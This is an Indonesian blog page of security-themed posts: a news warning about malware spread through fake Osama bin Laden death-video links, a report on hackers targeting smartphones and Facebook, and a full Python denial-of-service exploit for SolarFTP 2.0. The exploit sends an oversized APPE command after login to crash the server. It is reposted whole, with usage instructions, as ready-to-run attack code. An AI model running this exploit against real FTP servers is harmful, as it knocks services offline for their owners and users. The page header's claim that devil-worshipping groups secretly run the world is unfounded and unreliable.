Asalamualaikum ,  Selamat Datang  |  Its Not Diary  |  News And Opini  |  Thanks ?

Begitu banyak hal yang tertutupi dari negara kita sendiri bahkan dari konsep seluruh negara dan percayalah ada segelintir orang bahkan beberapa kelompok pemuja iblis yang mengatur konsep yang ada dan kita jalani saat ini.
Tampilkan postingan dengan label Scripting Dan Exploit. Tampilkan semua postingan
Tampilkan postingan dengan label Scripting Dan Exploit. Tampilkan semua postingan

Waspadai Link Palsu Video Osama (Awas jebakan betmen)


Simpang siur kabar bahwa Gedung Putih tidak akan merilis foto jenazah Osama bin Laden, di berbagai situs jejaring sosial seperti Facebook, beredar link-link yang menawarkan foto dan video kematian pemimpin al-Qaeda itu.

Namun, jangan percaya dan langsung mengklik begitu saja, karena link-link tersebut dicurigai sebagai spam dan bahkan bisa mengandung virus komputer berbahaya.

Pemerintah Federal dan pakar-pakar keamanan, sebagaimana dilaporkan CNN, telah mengeluarkan peringatan untuk para pengguna Internet agar berhati-hati mengklik link-link palsu terkait kematian Osama.

Menyusul operasi militer Amerika Serikat yang dilaporkan berhasil membunuh Osama, Minggu (1/5), Inbox e-mail dan sosial media seperti Facebook dibanjiri dengan link-link buruk setidaknya hanya spam atau kemungkinan terburuknya adalah mengandung virus komputer berbahaya.

Orang-orang di industri keamanan cyber tidak terkejut. Kejadian-kejadian besar, dan tokoh populer (Anna Kournikova dan Justin Bieber misalnya) sering dimanfaatkan sebagai umpan klik untuk menyebarkan spam dan scam.

"Saya kira ini (link-link palsu mengenai Osama) sebaiknya dihindari," tulis Dave Marcus, kepala penelitian keamanan untuk Mcfee Labs, dalam posting blog.

"Laporan kematian Osama bin Laden menjadi daya tarik yang terlalu bagus untuk dilewatkan bagi kriminal di dunia maya dan scammers," kata orang yang mem-posting beberapa contoh malware terkait Osama itu.

Satu pesan yang menawarkan link ke foto Osama yang sedang memegang koran, beredar untuk membuktikan bahwa pemimpin al-Qaeda itu masih hidup. Satu e-mail, yang ditulis dalam bahasa Spanyol, ditemukan mengandung virus Trojan Horse ketika link foto di dalamnya diklik.

Link itu berjudul Osama bin Laden Killed (Live on Video).

"Waspadalah terhadap pesan bertele-tele, baris subyek dalam e-mail, atau link-link via Facebook dan Twitter yang berisi kata-kata seperti itu--karena hampir pasti akan membawa anda dalam masalah," tulis Marcus.

"Pastikan perangkat lunak keamanan anda sepenuhnya diperbarui dan pastikan juga untuk menggunakan perangkat lunak browsing yang aman."

Sumber di Gedung Putih mengatakan bahwa Presiden AS Barack Obama telah memutuskan untuk tidak merilis foto-foto Osama.

Foto-foto palsu mengenai mayat Osama sudah beredar online.

Pada Rabu (4/5), Facebook mem-posting pesan yang mengingatkan pengguna agar berhati-hati ketika mengklik link-link dicurigai sebagai link-link spam mengenai Osama.

FBI juga merilis peringatan mengenai beredarnya software berbahaya yang disebarkan lewat link-link palsu.

Pusat Pengaduan Kejahatan Internet di FBI mengeluarkan saran-saran sebagai berikut:

Sesuaikan pengaturan privasi di situs jejaring sosial, seperti Facebook, untuk mem-filter item-item yang diposting ke dinding anda.

Jangan mengunduh perangkat lunak baru yang ditawarkan untuk melihat video. Aplikasi itu sering hanya sebagai topeng untuk menginveksi komputer anda.

Bacalah e-mail dan posting di media sosial dengan hati-hati. Pesan berbahaya sering ditulis dalam tata bahasa yang buruk, salah ejaan, dan kalimat bahasa Inggris tidak standar.

Laporkan pesan yang mengaku berasal dari FBI atau lembaga keamanan lainnya. Nama mereka sering digunakan untuk mencoba membangun legitimasi.
13.57 | 0 komentar

Hacker Intai Ponsel Pintar dan Facebook

Para pembobol data di internet atau disebut juga hacker makin malang melintang di rimbah persilatan. Ternyata, para hacker ini makin lihat dengan mengincar ponsel pintar dan jaringan pertemanan sosial seperti Facebook. Demikian dilansir Sydney Morning Herald, Rabu (6/4/2011).

Sebuah perusahaan pusat keamanan komputer, Symantec, mengeluarkan rilis yang menyatakan jika para kriminal di dunia maya makin canggih saja dalam menyerang pihak yang mereka incar. Para hacker ini mengincar kalangan bisnis dan jaringan pemerintah.

Symantec merilis, lebih dari 286 ancaman baru internet pada tahun lalu dan terus menyerang situs pertemanan sosial serta mengincar platforma ponsel pintar. "Kebanyakan platforma ponsel saat ini mengundang para hacker untuk menyerang," demikian isi rilis Symantec.

Maret lalu, ponsel pintar yang berbasis Android milik Google menjadi target terbesar tahun lalu dan merupakan serangan terbesar yang pernah ada.

"Serangan ini dilancarkan dari aplikasi mencurigakan di Android Market, pusat pemasaran resmi aplikasi untuk sistem operasi itu (Android)," demikian laporan yang diturunkan PandaLabs.

Tribunnews.com
02.00 | 0 komentar

SolarFTP 2.0 Multiple Commands Denial of Service Vulnerability



#!/usr/bin/python

# Exploit Title: SolarFTP 2.0 Multiple Commands Denial of Service Vulnerability
# Date: 12/17/2010
# Author: modpr0be
# Software Link: http://www.solarftp.com/files/solarftps-setup.exe
# Vulnerable version: 2.0
# Tested on: Windows XP SP2, Windows XP SP3
# CVE : N/A
#
# ======================================================================
# ___ _ __ __ __ _ __
# ____/ (_)___ _(_) /_____ _/ / ___ _____/ /_ (_)___/ /___ ____ _
# / __ / / __ `/ / __/ __ `/ / / _ \/ ___/ __ \/ / __ / __ \/ __ `/
# / /_/ / / /_/ / / /_/ /_/ / / / __/ /__/ / / / / /_/ / / / / /_/ /
# \__,_/_/\__, /_/\__/\__,_/_/ \___/\___/_/ /_/_/\__,_/_/ /_/\__,_/
# /____/ http://www.digital-echidna.org
# ======================================================================
#
# Greetz:
# say hello to all digital-echidna org crew:
# otoy, bean, s3o, d00m, n0rf0x, fm, gotechidna, manix
# special thx to amalia (^^), oebaj, offsec, exploit-db, corelan team
#
#### Software description:
# Solar FTP Server is a handy and easy to use personal FTP server with
# features like virtual directories, simple and intuitive user interface,
# real-time activity monitoring and management.
#
#### Exploit information:
# SolarFTP 2.0 will suddenly stop (crash) while these commands were sent:
# APPE, GET, PUT, NLST, and MDTM
# Sending USER with junk also crashing the Admin Configuration but not the service.
# Stack contains our junk in random. Both EIP and SEH were not overwritten.
#
#### Other information:
# 12/10/2010 - vendor contacted
# 12/17/2010 - no response, advisory released

import socket, sys
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)

junk = "\x41" * 80000

def banner():
print "\nSolarFTP 2.0 Multiple Commands Denial of Service Vulnerability."
print "By: modpr0be (modpr0be[at]digital-echidna[dot]org)\n"


if len(sys.argv)!=4:
banner()
print "Usage: %s <ip> <user> <pass>\n" %sys.argv[0]
sys.exit(0)

try:
s.connect((sys.argv[1], 21))
except:
print "Can\'t connect to server!\n"
sys.exit(0)

s.recv(1024)
s.send('USER '+sys.argv[2]+'\r\n')
s.recv(1024)
s.send('PASS '+sys.argv[3]+'\r\n')
s.recv(1024)
s.send('APPE '+junk+'\r\n')
s.recv(1024)
s.close()
23.12 | 0 komentar

Info Detik

Study Islam - Moslem Answer

RYKERS Watch | Yahudi Indonesia

MUSLIM MENJAWAB TANTANGAN